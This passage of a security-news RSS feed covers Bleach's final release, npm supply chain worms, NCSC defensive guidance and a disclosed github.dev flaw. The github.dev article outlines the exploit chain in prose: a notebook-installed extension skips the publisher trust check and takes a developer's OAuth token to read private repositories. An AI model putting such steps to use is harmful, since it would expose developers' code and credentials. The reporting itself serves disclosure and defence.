<p><a class="reference external" href="https://bleach.readthedocs.io/en/latest/changes.html#version-6-4-0-june-5th-2026">https://bleach.readthedocs.io/en/latest/changes.html#version-6-4-0-june-5th-2026</a></p>
</section>
<section>
<h3>Bleach v6.4.0 is the final release</h3>
<p>I haven't used Bleach on a project in years, but I still had some time to
maintain it. That changed about a year ago when I got re-orged into a new role
and I haven't had time to do any Bleach work since then.</p>
<p>To recap, Bleach sits on top of
<a class="reference external" href="https://github.com/html5lib/html5lib-python">html5lib</a> which hasn't
been actively maintained in years. It is dangerous to maintain Bleach in that
context.</p>
<p>We vendored html5lib so we could make adjustments to the library to keep Bleach
going. This is not a sustainable approach, but it was ok for the short term.</p>
<p>Over the years, we've talked about other options:</p>
<ol class="arabic simple">
<li><p>find another library to switch to</p></li>
<li><p>take over html5lib development</p></li>
<li><p>fork html5lib and vendor and maintain our fork</p></li>
<li><p>write a new HTML parser</p></li>
<li><p>etc</p></li>
</ol>
<p>None of those are feasible for me.</p>
<p>Bleach has been a solo-maintained project for a while now. The world is crazy
and it's much harder to build a team of trusted maintainers now than it was (or
at least, it sure feels that way). I don't see any possibility of increasing
the maintenance team or passing it to someone else responsibly.</p>
<p>Switching contexts from my regular work to Bleach is really hard. Bleach is
complicated, the problem domain is complicated, and there's a lot of nuanced
context. I can't just switch gears, spend 15 minutes on Bleach to do something,
and then switch back to the rest of my day. I periodically get nag messages
about this which are entirely valid, but there's nothing I can do about it.
It doesn't feel great.</p>
<p>Then in 2025, Emil, a long-time Bleach contributor, built
<a class="reference external" href="https://emilstenstrom.github.io/justhtml/">justhtml</a> which gives us an easy
migration path off of Bleach. He even took the time to write a
<a class="reference external" href="https://emilstenstrom.github.io/justhtml/bleach-migration.html">migration guide</a>.</p>
</section>
<section>
<h3>Thoughts and statistics</h3>
<p>In 2019, when I stepped down the first time, I wrote
<a class="reference external" href="https://bluesock.org/~willkg/blog/dev/bleach_stepping_down.html">a post on stepping down</a>.</p>
<p>In 2023, when I deprecated the project, I wrote
<a class="reference external" href="https://bluesock.org/~willkg/blog/dev/bleach_6_0_0_deprecation.html">a post on Bleach 6.0.0 and deprecation</a>.</p>
<ul class="simple">
<li><p>From the first commit on 2010-02-18 to today's final commit on 2026-06-05,
the Bleach project lasted 16 years, 3 months — 5,951 days, or about 16.29
years.</p></li>
<li><p>There were 64 releases.</p></li>
<li><p>There were roughly 960 commits.</p>
<ul>
<li><p>From 80 roughly contributors</p></li>
<li><p>Top 3:</p>
<ul>
<li><p>Will Kahn-Greene: 462</p></li>
<li><p>James Socol: 182</p></li>
<li><p>Greg Guthe: 133</p></li>
</ul>
</li>
</ul>
</li>
<li><p>Roughly 5,040 lines of Python code excluding the vendored html5lib.</p></li>
<li><p>I was maintainer from October 2015 to now--that's a little under 11 years.</p></li>
</ul>
<p>It feels weird to end a project that's outlived many of the Mozilla sites and
Python web frameworks it was designed to protect.</p>
</section>
<section>
<h3>What happens now?</h3>
<p>This is the end of the project.</p>
<figure>
<a class="reference external image-reference" href="https://bluesock.org/~willkg/blog/images/bleach_deprecation.jpg">
<img alt="/images/bleach_deprecation.thumbnail.jpg" src="https://bluesock.org/~willkg/blog/images/bleach_deprecation.thumbnail.jpg">
</a>
<figcaption>
<p>Bleach. Last release.</p>
</figcaption>
</figure>
<p>If you're still using Bleach, I think you have three options:</p>
<ol class="arabic simple">
<li><p><strong>End your project.</strong> Maybe you don't need to be maintaining your thing
anymore? Use Bleach as your reason to exit and do something different with
your time on Earth.</p></li>
<li><p><strong>Switch to the sanitizer API.</strong> Rework your project to use the sanitizer API.</p>
<ul class="simple">
<li><p>Spec: <a class="reference external" href="https://wicg.github.io/sanitizer-api/">https://wicg.github.io/sanitizer-api/</a></p></li>
<li><p>Docs: <a class="reference external" href="https://developer.mozilla.org/en-US/docs/Web/API/Element/setHTML">https://developer.mozilla.org/en-US/docs/Web/API/Element/setHTML</a></p></li>
</ul>
</li>
<li><p><strong>Swap Bleach out for justhtml.</strong> Emil provided a
<a class="reference external" href="https://emilstenstrom.github.io/justhtml/bleach-migration.html">migration guide</a>
for switching from Bleach to justhtml.</p></li>
</ol>
<p>Good luck with whatever option you choose!</p>
</section>
<section>
<h3>Thanks!</h3>
<p>Many thanks to <a class="reference external" href="https://github.com/jsocol">James</a> who created Bleach and
gave it a set of first principles that guided our choices for 16 years.</p>
<p>Many thanks to <a class="reference external" href="https://github.com/g-k">Greg</a> who I worked with on Bleach
for a long while and maintained Bleach for several years. Working with Greg was
always easy and his reviews were thoughtful and spot-on.</p>
<p>Many thanks to <a class="reference external" href="https://github.com/EmilStenstrom">Emil</a> who was
a contributor to Bleach for a long while and created
<a class="reference external" href="https://emilstenstrom.github.io/justhtml/">justhtml</a>
providing Bleach users a migration path.</p>
<p>Many thanks to <a class="reference external" href="https://github.com/jvanasco">Jonathan</a> who, over the years,
provided a lot of insight into how best to solve some of Bleach's more
squirrely problems.</p>
<p>Many thanks to <a class="reference external" href="https://github.com/gsnedders">Sam</a> who was an indispensible
resource on HTML parsing and sanitizing text in the context of HTML.</p>
<p>Many thanks to all the users and contributors of Bleach!</p>
</section>
<section>
<h3>Where to go for more</h3>
<p>For more specifics on this release, see here:
<a class="reference external" href="https://bleach.readthedocs.io/en/latest/changes.html#version-6-4-0-june-5th-2026">https://bleach.readthedocs.io/en/latest/changes.html#version-6-4-0-june-5th-2026</a></p>
<p>Documentation and quickstart here:
<a class="reference external" href="https://bleach.readthedocs.io/en/latest/">https://bleach.readthedocs.io/en/latest/</a></p>
<p>Source code and issue tracker here:
<a class="reference external" href="https://github.com/mozilla/bleach/">https://github.com/mozilla/bleach/</a></p>
</section>]]></content:encoded>
</item>
<item>
<title><![CDATA[So you've become a FOSS-Maintainer - Lessons learned from ~6 years of maintaining HedgeDoc (gpn24)]]></title>
<description><![CDATA[Erik and Molly (among others) became HedgeDoc maintainers during the pandemic. They started a complete rewrite of the project almost immediately and learned FOSS maintenance the hard way. In this talk they'll present some lessons learned, so that others might have a better starting point.

Now th...]]></description>
<link>https://tsecurity.de/de/3575323/it-security-video/so-youve-become-a-foss-maintainer-lessons-learned-from-6-years-of-maintaining-hedgedoc-gpn24/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3575323/it-security-video/so-youve-become-a-foss-maintainer-lessons-learned-from-6-years-of-maintaining-hedgedoc-gpn24/</guid>
<pubDate>Fri, 05 Jun 2026 14:18:34 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Erik and Molly (among others) became HedgeDoc maintainers during the pandemic. They started a complete rewrite of the project almost immediately and learned FOSS maintenance the hard way. In this talk they'll present some lessons learned, so that others might have a better starting point.

Now that you are a FOSS maintainer (or are aiming to become one) several questions might come to your mind.

- What's maintaining like?
- What can I do to make my life easier?
- How do I manage the community?
- How do I keep the motivation high?
- How can I prevent burnout?
- What's the important stuff that suddenly needs to be handled?

We were at the same point, but after six years continuous maintenance of a reasonably big FOSS project, we've come to some answers that we'd like to share with you. Expect some honest answers, funny anecdotes and hard learned lessons.

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://cfp.gulas.ch/gpn24/talk/V9WEYQ/]]></content:encoded>
</item>
<item>
<title><![CDATA[So you've become a FOSS-Maintainer - Lessons learned from ~6 years of maintaining HedgeDoc]]></title>
<description><![CDATA[Author: media.ccc.de - Bewertung: 1x - Views:6 https://media.ccc.de/v/gpn24-585-so-you-ve-become-a-foss-maintainer-lessons-learned-from-6-years-of-maintaining-hedgedoc

Erik and Molly (among others) became HedgeDoc maintainers during the pandemic. They started a complete rewrite of the project al...]]></description>
<link>https://tsecurity.de/de/3575322/it-security-video/so-youve-become-a-foss-maintainer-lessons-learned-from-6-years-of-maintaining-hedgedoc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3575322/it-security-video/so-youve-become-a-foss-maintainer-lessons-learned-from-6-years-of-maintaining-hedgedoc/</guid>
<pubDate>Fri, 05 Jun 2026 14:18:32 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: media.ccc.de - Bewertung: 1x - Views:6 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/UyHTe7xO0jY?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>https://media.ccc.de/v/gpn24-585-so-you-ve-become-a-foss-maintainer-lessons-learned-from-6-years-of-maintaining-hedgedoc<br />
<br />
Erik and Molly (among others) became HedgeDoc maintainers during the pandemic. They started a complete rewrite of the project almost immediately and learned FOSS maintenance the hard way. In this talk they'll present some lessons learned, so that others might have a better starting point.<br />
<br />
Now that you are a FOSS maintainer (or are aiming to become one) several questions might come to your mind.<br />
<br />
- What's maintaining like?<br />
- What can I do to make my life easier?<br />
- How do I manage the community?<br />
- How do I keep the motivation high?<br />
- How can I prevent burnout?<br />
- What's the important stuff that suddenly needs to be handled?<br />
<br />
We were at the same point, but after six years continuous maintenance of a reasonably big FOSS project, we've come to some answers that we'd like to share with you. Expect some honest answers, funny anecdotes and hard learned lessons.<br />
<br />
Molly, Erik<br />
<br />
https://cfp.gulas.ch/gpn24/talk/V9WEYQ/<br />
<br />
#gpn24 #SoftwareandInfrastructure<br />
<br />
Licensed to the public under https://creativecommons.org/licenses/by/4.0/<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[binding.gyp Supply Chain Attack Compromises Dozens of npm Packages Across Maintainer Accounts]]></title>
<description><![CDATA[A self-replicating worm has been quietly spreading across the npm registry using a method most security teams do not watch for. Instead of hiding inside package.json scripts, the attacker weaponized a tiny configuration file called binding.gyp to trigger malicious code…
Read more →
The post bindi...]]></description>
<link>https://tsecurity.de/de/3574081/it-security-nachrichten/bindinggyp-supply-chain-attack-compromises-dozens-of-npm-packages-across-maintainer-accounts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3574081/it-security-nachrichten/bindinggyp-supply-chain-attack-compromises-dozens-of-npm-packages-across-maintainer-accounts/</guid>
<pubDate>Fri, 05 Jun 2026 01:22:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A self-replicating worm has been quietly spreading across the npm registry using a method most security teams do not watch for. Instead of hiding inside package.json scripts, the attacker weaponized a tiny configuration file called binding.gyp to trigger malicious code…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/binding-gyp-supply-chain-attack-compromises-dozens-of-npm-packages-across-maintainer-accounts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/binding-gyp-supply-chain-attack-compromises-dozens-of-npm-packages-across-maintainer-accounts/">binding.gyp Supply Chain Attack Compromises Dozens of npm Packages Across Maintainer Accounts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dave Airlie on Linux Kernel Maintenance (SE Radio)]]></title>
<description><![CDATA[The Software Engineering Radio podcast has put up an
interview with graphics maintainer Dave Airlie.  Much of what is in
there will not be news to LWN readers, but it is an interesting overview of
the life of a large-subsystem maintainer.


	I was talking to a few of the Rust people, and I though...]]></description>
<link>https://tsecurity.de/de/3574016/linux-tipps/dave-airlie-on-linux-kernel-maintenance-se-radio/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3574016/linux-tipps/dave-airlie-on-linux-kernel-maintenance-se-radio/</guid>
<pubDate>Fri, 05 Jun 2026 00:23:39 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Software Engineering Radio podcast has put up <a href="https://se-radio.net/2026/06/se-radio-723-dave-airlie-on-linux-kernel-maintenance/">an
interview with graphics maintainer Dave Airlie</a>.  Much of what is in
there will not be news to LWN readers, but it is an interesting overview of
the life of a large-subsystem maintainer.
<p>
</p><blockquote class="bq">
	I was talking to a few of the Rust people, and I thought: these are
	very young people, these are a group of people in their 20s, maybe
	30s, they are a younger cohort of developers than the people I am
	normally used to dealing with.  I thought there was maybe a good
	way we could bring these groups together.  I think that having
	young people coming into the kernel using Rust is valuable...  So I
	thought that I should be supportive of bringing Rust into the
	kernel.
</blockquote>]]></content:encoded>
</item>
<item>
<title><![CDATA[binding.gyp Supply Chain Attack Compromises Dozens of npm Packages Across Maintainer Accounts]]></title>
<description><![CDATA[A self-replicating worm has been quietly spreading across the npm registry using a method most security teams do not watch for. Instead of hiding inside package.json scripts, the attacker weaponized a tiny configuration file called binding.gyp to trigger malicious code the moment a developer runs...]]></description>
<link>https://tsecurity.de/de/3573939/it-security-nachrichten/bindinggyp-supply-chain-attack-compromises-dozens-of-npm-packages-across-maintainer-accounts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3573939/it-security-nachrichten/bindinggyp-supply-chain-attack-compromises-dozens-of-npm-packages-across-maintainer-accounts/</guid>
<pubDate>Thu, 04 Jun 2026 23:23:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A self-replicating worm has been quietly spreading across the npm registry using a method most security teams do not watch for. Instead of hiding inside package.json scripts, the attacker weaponized a tiny configuration file called binding.gyp to trigger malicious code the moment a developer runs npm install. The campaign hit dozens of packages across multiple […]</p>
<p>The post <a href="https://cybersecuritynews.com/binding-gyp-supply-chain-attack-compromises-dozens-of-npm-packages/">binding.gyp Supply Chain Attack Compromises Dozens of npm Packages Across Maintainer Accounts</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Malicious binding.gyp Campaign Targets npm Packages Across Maintainer Accounts]]></title>
<description><![CDATA[On June 3, 2026, a highly coordinated supply chain attack compromised 57 npm packages across multiple maintainer accounts. The rapid campaign, lasting less than 2 hours, heavily impacted popular tools such as @vapi-ai/server-sdk and ai-sdk-ollama. Security researchers have identified the payload ...]]></description>
<link>https://tsecurity.de/de/3572529/it-security-nachrichten/malicious-bindinggyp-campaign-targets-npm-packages-across-maintainer-accounts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3572529/it-security-nachrichten/malicious-bindinggyp-campaign-targets-npm-packages-across-maintainer-accounts/</guid>
<pubDate>Thu, 04 Jun 2026 14:24:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>On June 3, 2026, a highly coordinated supply chain attack compromised 57 npm packages across multiple maintainer accounts. The rapid campaign, lasting less than 2 hours, heavily impacted popular tools such as @vapi-ai/server-sdk and ai-sdk-ollama. Security researchers have identified the payload as a new variant of the “Miasma” worm. This self-spreading malware targeted Red Hat […]</p>
<p>The post <a href="https://cyberpress.org/binding-gyp-targets-npm-maintainers/">Malicious binding.gyp Campaign Targets npm Packages Across Maintainer Accounts</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The NHS Was Lucky. The Next Victim Might Not Be.]]></title>
<description><![CDATA[In May 2026, malicious code appeared inside packages used across NHS software projects. The software supply chain attack named Mini Shai-hulud by researchers spread through CI/CD systems, package registries, and developer tooling before anyone noticed something was wrong. It was caught quickly. D...]]></description>
<link>https://tsecurity.de/de/3572526/it-security-nachrichten/the-nhs-was-lucky-the-next-victim-might-not-be/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3572526/it-security-nachrichten/the-nhs-was-lucky-the-next-victim-might-not-be/</guid>
<pubDate>Thu, 04 Jun 2026 14:24:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="800" height="533" src="https://thecyberexpress.com/wp-content/uploads/software-supply-chain-attack.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Software Supply Chain Attack, Supply Chain Attack, Mini Shai-Hulud, NCSC, CI/CD" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/software-supply-chain-attack.webp 800w, https://thecyberexpress.com/wp-content/uploads/software-supply-chain-attack-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/software-supply-chain-attack-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/software-supply-chain-attack-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/software-supply-chain-attack-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/software-supply-chain-attack-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/software-supply-chain-attack.webp 800w, https://thecyberexpress.com/wp-content/uploads/software-supply-chain-attack-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/software-supply-chain-attack-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/software-supply-chain-attack-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/software-supply-chain-attack-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/software-supply-chain-attack-750x500.webp 750w" sizes="(max-width: 800px) 100vw, 800px" title="The NHS Was Lucky. The Next Victim Might Not Be. 3"></p><p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">In May 2026, malicious code appeared inside packages used across NHS software projects. The software supply chain attack named Mini Shai-hulud by researchers spread through CI/CD systems, package registries, and developer tooling before anyone noticed something was wrong. It was caught quickly. Damage was limited.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The UK's National <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-cybersecurity/" target="_blank" rel="noopener" title="Cyber Security" data-wpil-keyword-link="linked" data-wpil-monitor-id="28555">Cyber Security</a> Centre is using that near-miss to bring into focus a more urgent case. The underlying conditions that made Mini Shai-hulud possible are not unique to that attack, and subsequent similar campaigns have gone undetected for longer and spread far more widely.</p>

<h3 class="font-claude-response-body break-words whitespace-normal leading-[1.7]"><strong>The Problem Is Structural</strong></h3>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">NCSC National Resilience Officer Jack F, is not mainly interested in a particular <a class="wpil_keyword_link" href="https://cyble.com/threat-actor/" target="_blank" rel="noopener" title="threat actor" data-wpil-keyword-link="linked" data-wpil-monitor-id="28557">threat actor</a> or a CVE but in how modern software development works — because that architecture is the vulnerability.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">A single application today may rely on dozens, sometimes hundreds, of third-party packages like libraries, frameworks, SDKs, and code snippets pulled in automatically when a developer runs a single install command. Node.js, Python, and Rust are singled out as especially exposed because their minimal standard libraries push developers toward external registries for even basic functionality. Once a package is in a dependency tree, it often pulls in further packages of its own — transitive dependencies that the original developer never consciously chose.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">This is not a flaw in the ecosystem's design. It is the design. The efficiency gains from reusable, trusted components are real, and the NCSC is not arguing against open source development. The argument is more specific to the combination of automation, implicit trust, and scale that turns a single compromised package into a vector capable of spreading malicious code across hundreds of organizations before any single one of them detects it.</p>

<h3 class="font-claude-response-body break-words whitespace-normal leading-[1.7]"><strong>Four Techniques Defenders Need to Know</strong></h3>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The NCSC documents four attacker techniques active in recent campaigns. The first is maintainer account compromise — attackers steal credentials or tokens that allow them to push malicious updates to a trusted, legitimate package. This is how the Axios npm attack in March 2026 worked. The maintainer account was hijacked, a malicious dependency injected, and the backdoor distributed to an estimated 80% of cloud environments before the window closed.</p>

<h5>Read: <a href="https://thecyberexpress.com/axios-supply-chain-attack-npm-malware/">Axios Supply Chain Attack Exposes Developers to Hidden Malware</a></h5>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The second technique is abandoned package takeover where attackers claim ownership of packages whose original maintainers have let their domains lapse or transferred control elsewhere. The third is typosquatting, in which, publishing packages with names that closely mimic popular legitimate ones, waiting for a developer to make a spelling error in an install command. The fourth is self-propagation, meaning, using credentials stolen from one package compromise to access or modify additional packages, creating a cascading contamination chain across an ecosystem.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">All four techniques <a class="wpil_keyword_link" href="https://cyble.com/exploit/" target="_blank" rel="noopener" title="exploit" data-wpil-keyword-link="linked" data-wpil-monitor-id="28558">exploit</a> the same structural feature. Once a package enters a trusted registry, downstream consumers inherit whatever trust that registry confers, automatically, at scale, with no human checkpoint.</p>

<h3 class="font-claude-response-body break-words whitespace-normal leading-[1.7]"><strong>What Defenders Are Being Asked to Do</strong></h3>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The NCSC's <a href="https://www.ncsc.gov.uk/blogs/software-supply-chain-attacks-check-your-dependencies" target="_blank" rel="nofollow noopener">immediate guidance</a> falls into three categories. The first is visibility. Organizations must audit recent package updates and version changes, identify newly introduced or unexpected dependencies, and maintain a software bill of materials — a documented inventory of every component a codebase relies on. Without that inventory, it is impossible to know whether a compromised package is present at all.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The second is detection. Teams should monitor CI/CD activity, network traffic, and credential use for anomalies, and run dependency scanning tools against known indicators of compromise published after supply chain incidents.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">And the third is remediation posture. If a compromise is suspected, automatic dependency updates should be paused immediately, new updates and versions reviewed manually before redeployment, and any potentially exposed API keys, tokens, and credentials rotated without waiting for confirmation of active exploitation. Enforcing multi-factor authentication on developer and package registry accounts is singled out specifically — the absence of universally enforced MFA on registry accounts is identified as a structural gap that maintainer account compromises directly exploit.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The NCSC also flags developer environments themselves as a soft target. Developer devices are typically less tightly controlled than managed corporate endpoints, making credential theft from developer workstations a reliable path to registry access that bypasses enterprise security controls entirely.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]"><span>As supply chain attacks on PyPI and npm packages have become a near-weekly occurrence across security <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="news" data-wpil-keyword-link="linked" data-wpil-monitor-id="28556">news</a> feeds, </span>rhe NCSC's guidance refers defenders to the Software Security Code of Practice as the authoritative framework for strengthening development and supply chain management. It also notes that its SSCoP implementation guidance will be updated shortly to reflect the specific attack scenarios.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hole in GitHub’s browser-based VSCode editor could lead to stolen token]]></title>
<description><![CDATA[A vulnerability in GitHub’s browser-based VSCode editor could lead to the theft of a developer’s token under certain circumstances, says a researcher.



The issue, revealed this week in a blog by Ammar Askar, has apparently been already addressed by GitHub owner Microsoft. But it raises a questi...]]></description>
<link>https://tsecurity.de/de/3571278/ai-nachrichten/hole-in-githubs-browser-based-vscode-editor-could-lead-to-stolen-token/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3571278/ai-nachrichten/hole-in-githubs-browser-based-vscode-editor-could-lead-to-stolen-token/</guid>
<pubDate>Thu, 04 Jun 2026 04:01:52 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A vulnerability in GitHub’s browser-based VSCode editor could lead to the theft of a developer’s token under certain circumstances, says a researcher.</p>



<p>The issue, revealed this week in a blog by <a href="https://ammaraskar.com/" target="_blank" rel="noreferrer noopener">Ammar Askar</a>, has apparently been already addressed by GitHub owner Microsoft. But it raises a questions about both DevOps security, and about the researcher’s allegation that, because Microsoft doesn’t treat bug discoveries seriously, he can justify giving it short notice before openly publishing vulnerabilities he finds.</p>



<p>First, the bug: Users of <em>github.com</em> may not realize it, but when they are on any repository, they can shift to <em>github.dev</em> and its browser-based version of VSCode just by changing the URL. </p>



<p>Why do this? Because the browser instance of VSCode is pretty powerful, Askar says in his blog. “You can view all the files in the repo (even if it’s a private one), you can send out pull requests, and even make commits.”</p>



<p><a href="https://www.linkedin.com/in/rob-enderle-03729/" target="_blank" rel="noreferrer noopener">Rob Enderle</a>, a IT consultant who heads the Enderle Group, agrees that jumping into VSCode this way is “an incredibly useful tactical tool for quick tasks. By just hitting the ‘.’ key in any GitHub repo, you instantly get a browser-based VS Code interface without having to clone gigabytes of data locally. It’s perfect for rapid PR reviews, quick documentation edits, or navigating code on the fly without breaking your workflow. Just keep in mind that it runs entirely in the browser sandbox; there’s no compute backend, no terminal, and no code execution.”</p>



<p>For any heavy lifting or actual compiling, he added, the developer will still need the raw compute of a local workstation, or a full cloud environment like Codespaces.</p>



<p>The problem, Askar says, is that this functionality is achieved by <em>github.com</em> POSTing over an OAuth token to <em>github.dev</em> that allows it to interact with GitHub on your behalf. “The token is not scoped to the particular repo you interacted with, meaning it has full access to every other repo that you have access to,” he wrote in the blog.</p>



<p>“The presence of this token, and the fact that this web app is running almost the entire brunt of VSCode’s million line Typescript codebase, makes it a great target for anyone looking into VSCode bugs,” he wrote.</p>



<h2 class="wp-block-heading">The exploit</h2>



<p>Askar said that a threat actor could install an extension in a repository using a Jupyter notebook, a web application for creating and sharing computational documents that has the ability to install a malicious local workspace extension while skipping the publisher trust check. In his proof of concept, Askar said that once his payload runs, the newly installed extension will grab the GitHub API token, run a query to get the private repos the developer has access to, and then print out the replies and the token.</p>



<p>This vulnerability also exists in the desktop version of VSCode, Askar said, though it’s harder to exploit, since a threat actor would need to convince the victim to clone their repo and open the notebook containing the webview script payload. “Of course,” he added, “if you [the hacker] had some other XSS [cross-site scripting attack] in a webview that you can get a victim to open, you get effectively full RCE [remote code execution] on their computer.”</p>



<p>In an email, he said this vulnerability was “about as serious as it gets. Any website on the internet could have redirected you to a <em>github.dev</em> link that could have provided an attacker a token to read and modify your code repos. If one could convince the maintainer of a popular software project to click a link, they could have made whatever modifications they wanted to their project.”</p>



<p>This means, said Enderle, “we have to start treating developer endpoints with strict, isolated, zero-trust parameters, because we clearly cannot rely on vendor complacency to protect us.”</p>



<p>This issue reinforces the point that you should never follow any links unless you know exactly where they will take you, added <a href="https://www.linkedin.com/in/dwaynemcdaniel/" target="_blank" rel="noreferrer noopener">Dwayne McDaniel</a>, principal developer advocate at GitGuardian.</p>



<h2 class="wp-block-heading">Short notice</h2>



<p>Here’s where things get complicated. Because of an unhappy experience when disclosing a previous VSCode vulnerability to Microsoft — the bug was fixed, but Askar wasn’t given credit — this time he only gave GitHub one hour notice that this new discovery was going to be published. Microsoft applied what <a href="https://github.com/microsoft/vscode/pull/319705" target="_blank" rel="noreferrer noopener">Askar calls a “stopgap” fix</a> by adding a confirmation when a developer opens notebooks in web VSCode, and by not allowing the <em>trusted publisher</em> requirement to be skipped by commands.</p>



<p><strong>[Related content: <a href="https://www.csoonline.com/article/4124766/when-responsible-disclosure-becomes-unpaid-labor.html" target="_blank">When responsible disclosure becomes unpaid labor</a>]</strong></p>



<h2 class="wp-block-heading">An ethical question</h2>



<p>Askar’s short notice raises an ethical question: How far in advance should a responsible researcher give notice to a vendor about a vulnerability before publicly revealing it?</p>



<p>These days, most infosec pros agree that notice <em>must</em> be given, or else a threat actor can quickly exploit a hole. Not only that, but the researcher risks damage to their reputation if reasonable notice isn’t given. Experienced researchers often give vendors at least 30 days to create and distribute a patch.</p>



<p>For their part, vendors often create bug bounty programs, or partner with bug bounty programs, to reward researchers for their work. Unfortunately, some vendors don’t always credit researchers, or downplay the damage a vulnerability can cause. In fact, last month Microsoft and a prominent cybersecurity researcher <a href="https://www.csoonline.com/article/4178869/microsoft-and-security-researchers-dueling-posts-about-cybersecurity-disclosures-get-nasty.html" target="_blank">got into a public spat</a> about one such alleged incident.</p>



<h2 class="wp-block-heading">An imbalance of power</h2>



<p>Asked for comment about Askar’s most recent discovery, a Microsoft spokesperson said, “we value the critical role that the security research community plays in strengthening the security of our products, services, and the broader technology ecosystem. While independent researchers determine when and how to publish their findings, we remain committed to rapidly assessing reported issues, mobilizing the appropriate engineering and security response resources, and delivering mitigations, guidance, and protections as quickly as possible to help safeguard our customers.”</p>



<p><strong>[Related content: <a href="https://www.csoonline.com/article/3491353/is-the-vulnerability-disclosure-process-a-glitch-in-itself-how-cisos-are-being-left-in-the-dark.html" target="_blank">Is the vulnerability disclosure process glitched?</a>]</strong></p>



<p>There is a balance between coordinating disclosure with a software vendor (CVD) and full disclosure, Askar told us. But, he added, there’s an imbalance of power. “A security researcher can pour countless hours into an issue, ensuring they develop a good proof of concept and provide all the steps to recreate the issue. With this, they hope to at least get an acknowledgement for their efforts, which they can use to further their security track record or, in the best case, a monetary bounty reward.”</p>



<p>However, he added, “If security vendors don’t adhere to their side of the bargain, public disclosure is one of the few options security researchers have (if they don’t want to sit on their vulnerabilities or sell them on the black market). It forces the vendor to acknowledge the security issue publicly and usually leads to a much faster resolution than any private communication would.”</p>



<p>This, said Enderle, creates problems for enterprises: “When vendor bureaucracy penalizes responsible disclosure, it alienates the security community and forces public zero-day drops, ultimately leaving enterprise customers holding the bag.”</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hole in GitHub’s browser-based VSCode editor could lead to stolen token]]></title>
<description><![CDATA[A vulnerability in GitHub’s browser-based VSCode editor could lead to the theft of a developer’s token under certain circumstances, says a researcher.



The issue, revealed this week in a blog by Ammar Askar, has apparently been already addressed by GitHub owner Microsoft. But it raises a questi...]]></description>
<link>https://tsecurity.de/de/3571232/it-security-nachrichten/hole-in-githubs-browser-based-vscode-editor-could-lead-to-stolen-token/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3571232/it-security-nachrichten/hole-in-githubs-browser-based-vscode-editor-could-lead-to-stolen-token/</guid>
